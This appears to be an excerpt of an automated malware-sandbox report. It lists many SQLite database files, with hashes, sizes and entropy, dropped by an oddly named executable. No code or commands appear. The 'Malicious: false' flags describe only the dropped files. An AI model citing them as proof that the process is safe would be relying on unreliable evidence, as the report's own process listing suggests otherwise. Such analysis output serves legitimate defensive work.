                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8439810553697228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8439810553697228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                  MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                  SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
